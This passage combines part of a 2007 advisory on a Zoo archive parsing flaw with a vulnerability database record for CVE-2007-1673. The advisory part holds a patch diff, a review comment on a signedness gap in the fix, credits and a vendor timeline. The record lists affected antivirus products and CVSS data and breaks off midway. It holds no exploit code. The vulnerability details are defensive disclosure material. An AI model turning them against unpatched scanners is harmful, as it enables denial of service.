diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /

static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }

#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /

loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /
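Review bot: The new guard `if (next_ptr <= zoo_pointer)` compares against a counter declared as `unsigned long zoo_pointer`, so if `next_ptr` is a signed `long` (its declaration is outside the hunk) a negative offset read from the archive is converted to a large unsigned value and passes the check. Rejecting it explicitly, `if (next_ptr < 0 || (unsigned long) next_ptr <= zoo_pointer)`, or declaring `zoo_pointer` as `long`, would close that gap; the same applies to the `direntry.next <= zoo_pointer` check in the zoolist.c hunk. The guard also only stops the walk if `prterror ('f', ...)` does not return, which these hunks do not show, and the enclosing loop starts and ends outside the hunk.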

diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /

while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }

  • / Begin tracking our position in the file /
  • zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
  • / Make sure we are not seeking to already processed data /
  • if (direntry.next <= zoo_pointer)
  • prterror ('f', "ZOO chain structure is corrupted\n");
  • zoo_pointer = direntry.next;
             /* ..seek to next dir entry */
    zooseek (zoo_file, direntry.next, 0);
    

VIII. CREDITS

Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.

IX. REFERENCES

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669

  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670

  3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671

  4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672

  5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673

X. HISTORY

2006-09-?? : Vulnerability is found
2007-03-19 : All vendors notified
2007-03-19 : Barracuda Networks provided a fix
2007-03-22 : Avira provided a fix
2007-04-02 : Panda Antivirus provided a fix
2007-04-14 : avast! antivirus provided a fix
2007-05-04 : Public disclosure



{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0187",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "amavis",
            scope: "lte",
            trust: 1.8,
            vendor: "amavis",
            version: "2.4.1",
         },
         {
            model: "antivir personal",
            scope: "eq",
            trust: 1.6,
            vendor: "avira",
            version: "7",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1.3,
            vendor: "avira",
            version: "6.35.00.00",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_900",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_400",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1098",
         },
         {
            model: "antivirus",
            scope: "lte",
            trust: 1,
            vendor: "avast",
            version: "4.7.980",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_800",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus and firewall",
            scope: "eq",
            trust: 1,
            vendor: "panda",
            version: "2007",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "zoo",
            scope: "lte",
            trust: 1,
            vendor: "rahul dhesi",
            version: "2.10",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.394",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 1,
            vendor: "picozip",
            version: "*",
         },
         {
            model: "antivir personal",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "*",
         },
         {
            model: "unzoo",
            scope: "eq",
            trust: 1,
            vendor: "unzoo",
            version: "4.4",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 1,
            vendor: "winace",
            version: "*",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1098",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.603",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1043",
         },
         {
            model: "antivir personal",
            scope: "lte",
            trust: 1,
            vendor: "avira",
            version: "7.3.0.5",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.04.00.23",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_200",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_100",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_500",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "panda",
            version: "2007",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "*",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_600",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus professional",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.1043",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.700",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.655",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.7.652",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "model_300",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 1,
            vendor: "barracuda",
            version: "*",
         },
         {
            model: "antivirus home",
            scope: "eq",
            trust: 1,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.6,
            vendor: "panda",
            version: "5.53",
         },
         {
            model: "antivir personal",
            scope: "eq",
            trust: 0.6,
            vendor: "avira",
            version: "7.3.0.5",
         },
         {
            model: "zoo",
            scope: "eq",
            trust: 0.3,
            vendor: "zoo",
            version: "2.10",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.605",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.5",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.60",
         },
         {
            model: "unzoo",
            scope: "eq",
            trust: 0.3,
            vendor: "unzoo",
            version: "4.4-2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.1",
         },
         {
            model: "titanium antivirus antispyware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006+",
         },
         {
            model: "titanium antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2005",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "20070",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006",
         },
         {
            model: "antivirus platinum",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "antivirus for netware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.54.1",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.0",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.15026",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.18",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.17",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.055",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.053",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.022",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.01.001",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.0.54",
         },
         {
            model: "desktop for windows",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "1.00.00.68",
         },
         {
            model: "antivir workstation professional build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "367",
         },
         {
            model: "antivir personaledition premium build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "228",
         },
         {
            model: "antivir personaledition classic build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "180",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5-1",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.726",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.676",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.660",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.566",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.489",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.460",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.603",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "antivirus managed client",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.394",
         },
         {
            model: "antivirus managed client",
            scope: null,
            trust: 0.3,
            vendor: "avast",
            version: null,
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.655",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001745",
         },
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:panda:panda_antivirus:2007:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_200:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_300:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_400:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:4.6.394:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:4.7.652:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.691:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.691:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:picozip:picozip:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:panda:panda_antivirus_and_firewall:2007:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:unzoo:unzoo:4.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_500:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_600:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:classic:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:4.7.700:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "4.7.980",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1098:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_100:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.04.00.23:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:7:*:classic:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "2.4.1",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.652:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.655:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6.665:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.652:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.665:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.869:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rahul_dhesi:zoo:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "2.10",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_800:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "7.3.0.5",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.6:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.603:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:windows:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1673",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-118",
         },
      ],
      trust: 0.9,
   },
   cve: "CVE-2007-1673",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
